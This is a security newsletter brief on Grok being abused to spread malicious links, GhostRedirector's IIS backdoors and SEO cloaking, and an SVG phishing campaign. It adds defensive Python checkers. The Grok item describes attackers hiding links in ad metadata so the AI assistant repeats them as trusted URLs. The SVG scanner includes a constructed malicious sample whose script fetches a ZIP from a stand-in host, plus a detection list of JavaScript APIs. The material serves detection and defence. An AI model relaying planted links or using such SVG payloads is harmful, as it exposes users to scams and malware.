Brief #120: Grok AI Exploited, Shadow AI Surge 200%, LOTL Attacks Increase by 84%

Nikoloz Kokhreidze


Colombian malware campaign using SVG files went completely undetected by all antivirus engines. C-suite executives show dangerous overconfidence compared to frontline security teams.


Happy Sunday!

The disconnect between C-suite confidence and frontline reality continues to widen, with executives feeling twice as confident about cyber readiness compared to the managers actually dealing with daily threats.

In this week's brief:

  • Threat actors are getting creative by exploiting Grok AI on X to spread malicious links through hidden metadata fields
  • Shadow AI usage has exploded 200% across enterprises, with companies now juggling an average of 320 AI applications outside IT oversight
  • SOC analyst burnout is reaching crisis levels due to chaotic scheduling and toxic management practices at understaffed centers

A quick note before we dive in.

Industry News

  • Malicious advertisers are exploiting a loophole: they hide malicious links in the "From:" metadata field of video ads on X, a field the platform's security filters do not scan.

  • When users ask Grok about these posts, the AI assistant extracts and shares the hidden links as clickable URLs, effectively bypassing X's link posting restrictions while gaining credibility from Grok's trusted system account status.

  • This technique, dubbed "Grokking" by researcher Nati Tal, has helped some malicious ads reach millions of impressions, leading to various scams and information-stealing malware.

GhostRedirector Poisons Windows Servers with Backdoors and SEO Fraud Tools

  • ESET researchers identified a China-aligned threat actor named GhostRedirector that compromised at least 65 Windows servers primarily in Brazil, Thailand, and Vietnam using a passive C++ backdoor (Rungan) and a malicious IIS module (Gamshen) for SEO fraud.

  • The attackers use EfsPotato and BadPotato exploits to create privileged users on compromised servers, ensuring persistent access even if their malware is removed, and deploy various webshells for maintaining access to the systems.

  • GhostRedirector's SEO fraud scheme uses the Gamshen module to manipulate Google search results by hijacking responses only for Googlebot requests, artificially promoting gambling websites without affecting regular visitors of the compromised sites.
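Because Gamshen serves altered pages only when the request looks like it comes from Googlebot, a server administrator cannot see the manipulation by browsing the site normally. The following is an added example, not code from the newsletter or from ESET: a small Python check that fetches the same URL with a browser User-Agent and with a Googlebot User-Agent and reports links and title text that appear only in the crawler-facing response. The `fetch`/`check_url` helpers, the two User-Agent strings and the two sample responses are all constructed for this illustration.

```python
"""Detect User-Agent cloaking on a web server you administer.

Hypothetical defender-side check (not from the newsletter or ESET): request
the same URL as a normal browser and as Googlebot, then diff the link sets and
the <title>. A clean server returns the same content to both.
"""
from html.parser import HTMLParser
import urllib.request

# Constructed User-Agent strings; any realistic values work.
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


class LinkExtractor(HTMLParser):
    """Collects every <a href> and the <title> text from an HTML document."""

    def __init__(self):
        super().__init__()
        self.links = set()
        self.title = ""
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for key, value in attrs:
                if key == "href" and value:
                    self.links.add(value.strip())
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def extract(html: str):
    parser = LinkExtractor()
    parser.feed(html)
    return parser.links, parser.title.strip()


def cloaking_diff(browser_html: str, crawler_html: str) -> dict:
    """Return what the crawler sees that a browser does not."""
    b_links, b_title = extract(browser_html)
    c_links, c_title = extract(crawler_html)
    return {
        "crawler_only_links": sorted(c_links - b_links),
        "title_changed": b_title != c_title,
    }


def fetch(url: str, user_agent: str, timeout: float = 10) -> str:
    """Plain GET with a chosen User-Agent (hypothetical helper)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_url(url: str) -> dict:
    """Fetch a URL you own twice and report any crawler-only content."""
    return cloaking_diff(fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA))


# Constructed sample responses (not captured from a real server).
BROWSER_RESPONSE = """<html><head><title>Acme Widgets</title></head>
<body><a href="/products">Products</a><a href="/about">About</a></body></html>"""
CRAWLER_RESPONSE = """<html><head><title>Best Online Casino Bonus</title></head>
<body><a href="/products">Products</a><a href="/about">About</a>
<a href="https://casino.example/">play now</a></body></html>"""

if __name__ == "__main__":
    print(cloaking_diff(BROWSER_RESPONSE, CRAWLER_RESPONSE))
    # Uncomment to probe a server you administer:
    # print(check_url("https://www.example.com/"))
```

Run this against your own hosts only. A User-Agent probe is a first pass: a malicious IIS module can also gate on the source IP of Google's crawlers, in which case the probe shows nothing and the better evidence is a diff of response sizes for Googlebot versus browser requests in the IIS logs.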

VirusTotal Uncovers Undetected Colombian Malware Campaign Using SVG Files

  • VirusTotal's Code Insight detected a sophisticated phishing campaign impersonating the Colombian justice system through SVG files that went completely undetected by all antivirus engines.

  • The malicious SVGs execute embedded JavaScript to render a fake government portal and simulate a document download with a progress bar, while silently fetching a malicious ZIP archive in the background.

  • Investigation revealed 523 samples dating back to August 2025, with attackers using polymorphism techniques and Spanish-language code comments to evade detection while targeting Colombian users via email.
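An SVG is an XML document, so a file that is really a dropper has to carry its logic as `<script>` elements, event-handler attributes or `foreignObject` wrappers, none of which a legitimate image needs. The following is an added example, not code from the newsletter or from VirusTotal: a Python triage script that parses an SVG and reports those markers plus download-related JavaScript APIs. The two sample files, the `SUSPICIOUS_JS` list and the finding labels are constructed for this illustration.

```python
"""Static triage of SVG files for embedded active content.

Hypothetical defender-side script (not from the newsletter or VirusTotal).
It reports script elements, on* event handlers, foreignObject elements,
javascript:/data: hrefs, external hrefs and download-related JS APIs.
"""
import re
import xml.etree.ElementTree as ET

# JavaScript APIs that an SVG lure typically needs to fetch, decode and save a payload.
SUSPICIOUS_JS = ("fetch(", "XMLHttpRequest", "atob(", "eval(", "document.write",
                 "createElement('a')", 'createElement("a")', ".download", "Blob(")


def local_name(tag: str) -> str:
    """Strip the namespace from an ElementTree tag or attribute like '{ns}href'."""
    return tag.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list[str]:
    """Return a sorted list of finding labels; an empty list means nothing suspicious."""
    findings = []
    text = data.decode("utf-8", errors="replace")
    # Entity declarations are never needed in an image and enable entity-expansion
    # attacks against the parser, so flag them and stop before parsing.
    if re.search(r"<!ENTITY", text, re.I):
        return ["dtd-entity-declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        findings.append("malformed-xml")
        if re.search(r"<script", text, re.I):  # raw fallback when XML is broken
            findings.append("script-element")
        return findings
    for el in root.iter():
        name = local_name(el.tag).lower()
        if name == "script":
            findings.append("script-element")
            body = el.text or ""
            for api in SUSPICIOUS_JS:
                if api in body:
                    findings.append(f"js-api:{api}")
        elif name == "foreignobject":
            findings.append("foreignObject-element")
        for attr, value in el.attrib.items():
            aname = local_name(attr).lower()
            v = value.strip().lower()
            if aname.startswith("on"):
                findings.append(f"event-handler:{aname}")
            if aname == "href":
                if v.startswith(("javascript:", "data:")):
                    findings.append(f"href-scheme:{v.split(':', 1)[0]}")
                elif v.startswith(("http://", "https://")):
                    findings.append("external-href")
    return sorted(set(findings))


# Constructed samples (not real campaign files).
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<circle cx="5" cy="5" r="4" fill="red"/></svg>')

SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <foreignObject width="800" height="600">
    <div xmlns="http://www.w3.org/1999/xhtml">Portal de descarga</div>
  </foreignObject>
  <a xlink:href="javascript:run()"><text y="20">Descargar</text></a>
  <script><![CDATA[
    // fake progress bar, then fetch an archive in the background
    function init() { fetch('https://payload.invalid/doc.zip'); atob('QUJD'); }
  ]]></script>
</svg>"""

if __name__ == "__main__":
    print("benign:", scan_svg(BENIGN_SVG))
    print("suspicious:", scan_svg(SUSPICIOUS_SVG))
```

Run it at the mail gateway or on a quarantine folder; any finding other than `external-href` is reason to block the attachment, since a vector drawing has no business executing script. The raw-text fallback matters because a polymorphic sample that breaks the XML parser should still be flagged rather than silently passed.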
